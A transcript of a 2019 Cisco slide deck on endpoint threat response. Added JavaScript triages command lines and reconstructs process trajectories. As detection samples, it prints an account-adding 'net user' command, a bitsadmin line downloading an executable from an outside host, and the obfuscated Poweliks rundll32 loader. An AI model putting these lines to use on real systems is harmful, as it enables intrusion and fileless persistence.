Cisco Threat Response Architecture
Transcript of the slide deck
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Thorsten Schranz, Advanced Malware Prevention (AMP), 2019-05-21
Cisco Threat Response Architecture
Why we need endpoint information
Behavior
Complexity
Company
Products
Malware
Mindset
Strategy
Knowledge
Features
Detection Engines
Coverage
The history of Endpoint Protection
Probability
Detection?
Investigation?
Remediation?
…the Strategy, Products and Malware must fit to be successful in the Future…
From Event to Context – what can be included
Event(s)
Events from various point products.
Context
Includes much information. Events are one part only.
Sensor
Sharing
Intelligence
Sensor
Generates processable Data
Intelligence
Processes the Sensor Data
Sharing
Automated sharing and processing the Analysis Data with other Intelligences or Products
What is Threat Intelligence – Key Components
Outcome
Analysis data
IOC data
Behavior Information
Relationship between Artifacts
Outcome
Sensor
Intelligence
Sharing
Sharing
Threat Information
Cisco Products
3rd Party Integrations
Intelligence to Intelligence OR Intelligence to Product
Sensors on a worldwide base
Network (NetFlow)
Content (Web, E-mail)
DNS based
File Analysis
3rd Party Feeds
Trusted Sources
Intelligences
Co-Occurrence Model
Anomaly Detection, Trust Modeling, Events Classification, Relationship Modeling
Correlations, Artificial Intelligence
3rd Party Intelligence
Extensive Automation Framework, Large Scale Datamining, Big Data
Analytics and automated detection
Generating an understanding
real world scenarios
OnPremise Intelligences
Threat Intelligence
Postulation – Single spot is not enough
Known Good
Unknown
Known Bad
Complexity
Protection
+
Sensor
Intelligence
Single Spot 1:1 Analysis
Multi Spot n:n Analysis
Endpoint
Web
IPS
NGFW
Protection
Postulation – Single spot is not enough
Single Spot (Sensor)
Multi Spot (Sensor)
Context
Includes much information. Events are one part only.
Classify based on context
Endpoint Challenge Example – 1:1 Volume
Counters by Talos
• Too much data to handle on-premise
• Too much data to handle directly on the client
• Threat landscape is too complex to be handled on the endpoint only
• Another approach necessary
46M OS operation events
• 8.7M File events
• 11.5K Process events
• 114K Network events
• 35M Registry events
• 1.5M unique Samples Daily
• 20B Threats blocked/day
• 150B DNS entries daily
• 18.5B AMP queries/day
• 16B URLs/Web requests daily
• Threat Data processed: 120TB/day, 3.6PB/month
[Chart: unique hashes / week – values 4,9 / 96,8 / 95,5 / 29]
Result: 20 min. with Win 10 (Procmon)
Endpoint Challenge Example – 1:n Complexity
Behavior Cluster
Malicious behaviour cluster including hundreds/thousands/millions of artifacts and also including one or more Threat Events
No Event / No Information (shown six times in the diagram)
N + = X
Information
Threat Feeds
Intelligences
Analytic Systems
Researcher
Event
Event Details
Endpoint Challenge Example – 1:n Time Window
Engines / Technologies
Protection Engines 1 to X
Advanced Analytics
When needed?
Configuration
Endpoint Configuration
Cloud and Intelligence
When querying cloud or other intelligences
Start
Something comes up at the endpoint.
1 of 46 Million
Endpoint Challenge Example – 1:n Timeline
Bad or not?
C:\Windows\system32\cmd.exe /c net user 'jmaldive' /add
Windows command line: legitimate Windows feature
User management tool
Argument: add a user named jmaldive
Bad or not?
"C:\Windows\System32\bitsadmin.exe" /transfer kiWDPYASe /download/priority foreground https://www.uz.gov.ua/en/:7777/content C:\trust.exe
Windows Update Command Line Arguments
Domain
• Category: Business
• Reputation: good
• IP-Reputation: good
• Status: Compromised?
Payload
rundll32.exe javascript:\..\mshtml,RunHTMLApplication ;eval(epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18:b9e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*.replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))
Bad or not?
Windows Component
Java
Command Line Argument
Poweliks is a fileless click-fraud malware variant which resides within the registry. It maintains persistence by creating a registry key that makes use of rundll32 to execute JavaScript code to read PowerShell from the Windows registry, which subsequently executes portable executable code in memory.
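The three command lines on the "Bad or not?" slides (net user, bitsadmin and the Poweliks rundll32 loader) cannot be classified from the process image alone; the argument context decides. The following JavaScript is an added example, not code from the Cisco deck or from AMP: it tags the legitimate-feature patterns the slides show and, for the rundll32/javascript: case, statically reverses the charCodeAt()-1 character shift the loader would apply at runtime, so an analyst can read the payload without evaluating it. The tag names, regexes and helper functions are assumptions made for this example; the sample command lines are the ones printed on the slides, held as inert string constants that are never run.

```javascript
// Added example (not code from the Cisco deck): context-based triage of the
// command lines on the "Bad or not?" slides. Nothing here executes a command.

// Legitimate Windows features that become suspicious through their arguments.
// Tag names and regexes are assumptions made for this example.
const CONTEXT_RULES = [
  { tag: "user-management",
    pattern: /\bnet(?:1)?(?:\.exe)?\s+user\s+\S+.*\/add\b/i },          // net user <name> /add
  { tag: "bits-download",
    pattern: /\bbitsadmin(?:\.exe)?"?\s+\/transfer\b.*\/download\b/i }, // bitsadmin /transfer ... /download
  { tag: "rundll32-javascript",
    pattern: /\brundll32(?:\.exe)?\s+javascript:/i },                   // rundll32 with a javascript: URL
];

// The loader construct shown on the Poweliks slide:
//   eval(<blob>.replace(/./g,function(_){return String.fromCharCode(_.charCodeAt()-N);}))
// The quotes around <blob> are optional because they are missing on the slide;
// %20 is the URL-encoded space inside a javascript: URL.
const SHIFTED_EVAL =
  /eval\(\s*"?([^"]*?)"?\.replace\(\/\.\/g,\s*function\(_\)\{\s*return(?:%20|\s)+String\.fromCharCode\(_\.charCodeAt\(\)\s*([+-])\s*(\d+)\);?\s*\}\)\)/;

function tagCommandLine(cmd) {
  return CONTEXT_RULES.filter(r => r.pattern.test(cmd)).map(r => r.tag);
}

// Apply the same per-character shift the loader would apply at runtime, as a
// pure string transform: the decoded payload is returned for reading, not run.
function decodeShiftedPayload(cmd) {
  const m = SHIFTED_EVAL.exec(cmd);
  if (!m) return null;
  const delta = Number(m[3]) * (m[2] === "-" ? -1 : 1);
  return m[1].replace(/./g, c => String.fromCharCode(c.charCodeAt(0) + delta));
}

// Indicators worth surfacing from a decoded payload (assumed vocabulary).
function payloadIndicators(decoded) {
  const found = [];
  if (/ActiveXObject\(/.test(decoded)) found.push("activex-object");
  if (/RegRead\(/.test(decoded)) found.push("registry-read");
  if (/<script/i.test(decoded)) found.push("script-injection");
  return found;
}

function triage(cmd) {
  const tags = tagCommandLine(cmd);
  const decoded = decodeShiftedPayload(cmd);
  const indicators = decoded ? payloadIndicators(decoded) : [];
  // "needsContext" is the slide's question: the image alone does not answer it.
  return { tags, decoded, indicators, needsContext: tags.length > 0 || decoded !== null };
}

// The three command lines printed on the slides, as inert string constants.
const SLIDE_CMDLINES = {
  netUser: String.raw`C:\Windows\system32\cmd.exe /c net user 'jmaldive' /add`,
  bitsadmin: String.raw`"C:\Windows\System32\bitsadmin.exe" /transfer kiWDPYASe /download/priority foreground https://www.uz.gov.ua/en/:7777/content C:\trust.exe`,
  poweliks: String.raw`rundll32.exe javascript:\..\mshtml,RunHTMLApplication ;eval(epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18:b9e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*.replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))`,
};

// Worked result for the three slide command lines.
const SLIDE_TRIAGE = Object.fromEntries(
  Object.entries(SLIDE_CMDLINES).map(([name, cmd]) => [name, triage(cmd)]));

console.log(JSON.stringify(SLIDE_TRIAGE, null, 2));
```

For the Poweliks line the decoded text starts with document.write('<script language=jscript.encode>' and reads a value from under HKCU\software\classes\clsid with WScript.Shell.RegRead, which is exactly the "read the payload from the registry" behaviour the slide describes; the net user and bitsadmin lines decode to nothing and are tagged only, because for them the verdict depends on who ran them, where and when.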
What is part of my Security Architecture?
What happens
Threats?
Fileless ?
Legitimate OS Feature Usage?
What we talk about
Specific Single Topics!
E.g. Mimikatz
E.g. Detection Rate
** Source: https://mitre-attack.github.io/attack-navigator/enterprise/
Impact
Product Strategy
Solution Design
Correlations in SIEM
Mitre: Techniques linked to tactics**
11 Tactics
300 Techniques
…where we may not talk about…
Combinations of Tactics and Techniques
Timeline
Mitre ATT&CK
Mitre ATT&CK
Tactics linked to techniques.
tactics:
persistence
initial-access
command-and-control
exfiltration
collection
lateral-movement
execution
credential-access
discovery
privilege-escalation
defense-evasion
Mitre ATT&CK
tactics: persistence
.bash_profile and .bashrc
accessibility features
account manipulation
appcert dlls
appinit dlls
application shimming
authentication package
bits jobs
bootkit
browser extension
change default file association
component firmware
component object model hijacking
create account
dll search order hijacking
dylib hijacking
external remote access
file system permission weakness
hidden files and directories
hooking
hypervisor
Image file execution options
kernel modules and extensions
launch agent
launch daemon
launchctl
lc_load_dylib_addition
local job scheduling
login item
logon script
lsass driver
modify existing service
netsh helper dll
new service
office application startup
path interception
plist modification
port knocking
port monitors
rc.common
re-open applications
redundant access
registry run keys / startup folder
scheduled tasks
screensaver
security support provider
service registry permission weakness
setuid and setgid
shortcut modification
sip and trust provider hijacking
startup items
system firmware
time providers
trap
valid accounts
web shell
windows management instrumentation
winlogon helper dll
bits jobs
Create account
Kernel modules and extensions
login script
new service
Scheduled tasks
What is part of my architecture?
Network Layer
NGFW
NGIPS / E-Mail / Web / Threat Grid
Security Cameras
Thermostats
VoIP Phones
Printers
SOC
Monitoring and Threat Hunting
Windows command-line
Legitimate Windows Feature
C&C Info in Graphics
twitter.com
Mobile Users
Endpoint
The Race – Threats and Endpoint Strategy
Endpoint
#Legitimate OS Feature usage
#Command Line
#Behavior
#communication
#file creation
#fileless
#timeline
#Just-in-Time
#artifacts
#payload
Endpoint Connector Endpoint Backend
Protection
Engines
Endpoint
Monitoring
Backend
Intelligence
Endpoint
Time / Resource
Step 3: Endpoint Monitoring
Step 2: Backend Intelligence
Step 1: Endpoint Connector and Backend
Step 4: Moving Time and Resource intensive Processes from the Endpoint to the Backend
SOAR
and SIEM
Capabilities
Files
Process
Network
CMD
IOC
Step 5: Analysis 7x24x365 in Backend
Backend
Management
Time / Resource
The Race – Threats and Endpoint Strategy
AMP Architecture and Platform
Threat
Intelligence
and
Research
Advanced
Analytics
Agentless
Detection
Web
IPS
NGFW
Perimeter
&
Network
3rd Party
Integration
Standards
APIs
The Race – Threats and Endpoint Strategy
Meraki Systems Manager
Tetration
Web Security
Email Security+CLOUD
Advanced Threat: AMP FOR ENDPOINTS • AMP CLOUD
THREAT GRID • COGNITIVE
Identity Services Engine +pxGRID
Umbrella+INVESTIGATE
Digital Network Architecture: CATALYST • NEXUS • MERAKI MS
AIRONET/WLC • MERAKI MR
Firepower NGFW/NGIPS
Threat Response
Stealthwatch+CLOUD
Secure SD-WAN / Router: ISR • CSR • ASR • vEDGE
MERAKI MX
Integrated Architecture
Cloudlock
Threat Response – The Future
The Race – Threats and Endpoint Strategy
Threat
Response
Threat
Intelligence
and
Research
Advanced
Analytics
Agentless
Detection
Web
IPS
NGFW
Perimeter
&
Network
3rd Party
Integration
Standards
APIs
AMP
for
Endpoints
Event
Analysis
Report
Trajectory
Threat Hunt
The Race – Threats and Endpoint Strategy
Web Analysis
Real World Example
Disk / Memory
Sophisticated Malware Example – Infection/Protection (CL)
Code Installation: Malware installed, Code Injection
Binary Data
Dynamically created Content
Loaded from 3rd party
Obfuscated Content
Encrypted Content
Looks like “waste”
Partial Download
HTTPS Traffic
Hidden Protocol in HTTPS
Category: Business
Reputation: good
IP-Reputation: good
Status: Compromised
Good? Malicious? Unknown?
WORKING: Hidden, Stealthy, time-delayed
DECOY User
PREVENT Detection
New Sample in the world
In Memory: Evasion, Code generated, Code Injection
.HLP .MSI
New Attack vector
New vulnerabilities
.SVC .DLL .ISO .OCX .EXE ews.exe
Dropped Payload, automatically executed, generates new Files
.EXE
OInfoP11.exe created
OInfo11.ocx created, holds Decryption Info
OInfo11.iso extracted, encrypted, compressed
Event
On-Access Scan?
On-Demand Scan?
Event not handled?
Behavior Cluster
Malicious behaviour cluster including hundreds/thousands/millions of artifacts and also including one or more Threat Events
Disk / Memory
Code Installation: Malware installed, Code Injection
Binary Data
Dynamically created Content
Loaded from 3rd party
Obfuscated Content
Encrypted Content
Looks like “waste”
Partial Download
HTTPS Traffic
Hidden Protocol in HTTPS
Category: Business
Reputation: good
IP-Reputation: good
Status: Compromised
Good? Malicious? Unknown?
WORKING: Hidden, Stealthy, time-delayed
DECOY User
PREVENT Detection
New Sample in the world
In Memory: Entrenchment, Code generated, Code Injection
.HLP .MSI
New Attack vector
New vulnerabilities
.SVC .DLL .ISO .OCX .EXE ews.exe
Dropped Payload, automatically executed, generates new Files
.EXE
OInfoP11.exe created
OInfo11.ocx created, holds Decryption Info
OInfo11.iso extracted, encrypted, compressed
Status: Clean
No Sample, no Signature
Infection Vector unknown
Time-to-detect infected host
Single File not malicious
C&C Communication
Data Loss
Which Artifacts are left for investigation?
Which Information is available for investigation?
Artifact Dependencies
Fileless and persistent
Sophisticated Malware Example – Infection/Protection (CL)
Endpoint Detection and Response Approach
Monitoring Engine
Disk Activity
Process Activity
Command Line Monitoring
Connected Intelligences
Stores and processes Monitoring data
Threat Response Architecture
Endpoint Architecture
Files
Process
Network
CMD
IOC
SOAR
and SIEM
Capabilities
Backend
Management
IOC Event Detail Examples
Generic IOC: Powershell Download
Monitoring (Sensor)
Intelligence
Incident Management without Cisco Threat Response
Incident Response (IR) without Cisco Threat Response (CTR)
Timeline (Hours? Days? Weeks?)
1. Alert: Malware Alert from a single point product
2. Searching: Search in SIEM or other available information sources, log files and so on.
3. Verify: Verify the event, e.g. whether further analysis is necessary
4. Ticketing: Open Ticket – defined process?
5. Availability: Client not available, user on PTO, no sensor, different department
6. Find the Malware: Where, who, how, when… – Disk Forensics: on-demand scan, manual search, knowledge? Full Disk Forensics
7. Format Device: most information lost
8. Deliver: System back to user
IR without CTR – C&C traffic alert!!
Timeline (Hours? Days? Weeks?)
C&C Traffic Alert – Alert by Next-Gen Network:
• C&C Traffic Detected
• Destination: 52.28.249.128 – Threat Intelligence?
• Source: 10.0.2.11 – Q, Q, Q, Q, Q, Q, ?
• Pcap Capture available?
Searching: Sources? Intelligences? Correlations?
Tools: Search on Client, Search in SIEM
Q1 - DHCP info? Q2 - AD info? Q3 - CMDB info? Q4 - Vulnerability info? Q5 - AV info? Q6 - Who is doing the C&C?
Analysis Tools: Process Explorer, Wireshark, Full Disk Forensics, Other Tools
Result: a.Exe Hash: 92a6…………7a (Payload / OS / Hardware)
Next Steps – What to do next?
Q1 - Commodity/Targeted? Q2 - Persistency? Q3 - Ransom/Backups? Q4 - Lateral movement? Q5 - Clean/Format?
Visibility with EPP Approach
Device Trajectory
Worst case – Single Threat Event
Event does not show what really happened
Detection is often not Real-Time
No dependencies between artifacts and behaviour
Missing Information for OnPremise Intelligence
Missing legitimate OS functions and behaviour (chkdsk)
Threat Event? Threat Event? Threat Event?
Understand Threat with EPP/EDR approach
Device Trajectory
IOC Vulnerability: Application with vulnerability
Execution: Application X was executed by application Y
PDF created
Network: Established network connections
Activity: Create, execute and network connection
Activity: Malicious File starts chkdsk.exe
Chkdsk.exe: Network connection and drops/executes a malicious file.
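The trajectory the slide describes (a vulnerable application executed by another, a PDF created, network connections, a dropped file that runs and starts chkdsk.exe) is the context that a single "malicious file" event lacks. The following JavaScript is an added example, not Cisco code and not the AMP Device Trajectory implementation: it reconstructs that trajectory from raw endpoint telemetry by linking process, file and network records through process ids. The record format, the process ids, paths and addresses are constructed for the example and are assumptions, not the AMP connector's data model.

```javascript
// Added example (not Cisco code, not the AMP Device Trajectory implementation):
// reconstruct the trajectory of one artifact from raw endpoint telemetry.
// Record format, pids, paths and addresses are constructed for this example.
const TELEMETRY = [
  { ts: 1, type: "process", pid: 100, ppid: 1,   image: "C:\\Windows\\explorer.exe" },
  { ts: 2, type: "process", pid: 200, ppid: 100, image: "C:\\Program Files\\Reader\\reader.exe" }, // application Y
  { ts: 3, type: "file",    pid: 200, op: "create", path: "C:\\Users\\u\\invoice.pdf" },
  { ts: 4, type: "network", pid: 200, dst: "203.0.113.10:443" },
  { ts: 5, type: "file",    pid: 200, op: "create", path: "C:\\Users\\u\\AppData\\x.exe" },
  { ts: 6, type: "process", pid: 300, ppid: 200, image: "C:\\Users\\u\\AppData\\x.exe" }, // application X
  { ts: 7, type: "network", pid: 300, dst: "198.51.100.7:8080" },
  { ts: 8, type: "process", pid: 400, ppid: 300, image: "C:\\Windows\\System32\\chkdsk.exe" },
  { ts: 9, type: "process", pid: 500, ppid: 100, image: "C:\\Windows\\System32\\notepad.exe" }, // unrelated
];

const basename = p => p.split(/[\\/]/).pop();

function indexProcesses(events) {
  const byPid = new Map();
  for (const e of events) if (e.type === "process") byPid.set(e.pid, e);
  return byPid;
}

// Follow ppid links upwards; returns image names root first.
function ancestry(byPid, pid) {
  const chain = [];
  for (let p = byPid.get(pid); p; p = byPid.get(p.ppid)) chain.unshift(basename(p.image));
  return chain;
}

// Everything the telemetry links to one file artifact: who wrote it, what the
// writer talked to before the drop, what ran from it and what that started.
// Returns null when the artifact was never both created and executed.
function artifactContext(events, path) {
  const byPid = indexProcesses(events);
  const create = events.find(e => e.type === "file" && e.op === "create" && e.path === path);
  const exec = events.find(e => e.type === "process" && e.image === path);
  if (!create || !exec) return null;
  const children = events.filter(e => e.type === "process" && e.ppid === exec.pid);
  const involved = new Set([create.pid, exec.pid, ...children.map(c => c.pid)]);
  return {
    artifact: basename(path),
    createdBy: basename(byPid.get(create.pid).image),
    creatorConnectionsBeforeDrop: events
      .filter(e => e.type === "network" && e.pid === create.pid && e.ts < create.ts)
      .map(e => e.dst),
    ancestors: ancestry(byPid, exec.ppid),
    ownConnections: events.filter(e => e.type === "network" && e.pid === exec.pid).map(e => e.dst),
    children: children.map(c => basename(c.image)),
    // A single "malicious file" alert is one record; the trajectory is all of these.
    relatedEvents: events.filter(e => involved.has(e.pid)).length,
  };
}

// Analyst-readable rendering of the trajectory.
function describe(ctx) {
  return [
    `${ctx.artifact} was created by ${ctx.createdBy} (lineage: ${ctx.ancestors.join(" > ")})`,
    `before the drop, ${ctx.createdBy} connected to: ${ctx.creatorConnectionsBeforeDrop.join(", ") || "none"}`,
    `${ctx.artifact} connected to: ${ctx.ownConnections.join(", ") || "none"}`,
    `${ctx.artifact} started: ${ctx.children.join(", ") || "nothing"}`,
    `${ctx.relatedEvents} telemetry records belong to this trajectory`,
  ].join("\n");
}

console.log(describe(artifactContext(TELEMETRY, "C:\\Users\\u\\AppData\\x.exe")));
```

The point of the example is the count at the end: the on-access scanner's view of x.exe is one record, while the telemetry ties seven records (the reader process, the PDF, two connections, the drop, the execution and chkdsk.exe) to the same artifact, which is what makes the "legitimate OS function" chkdsk.exe explainable instead of invisible.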
Demo: from Webtraffic to the endpoint
Thank you
…the Strategy, Products and Malware must fit to be successful in the future…
cisco.com/go/ampendpoint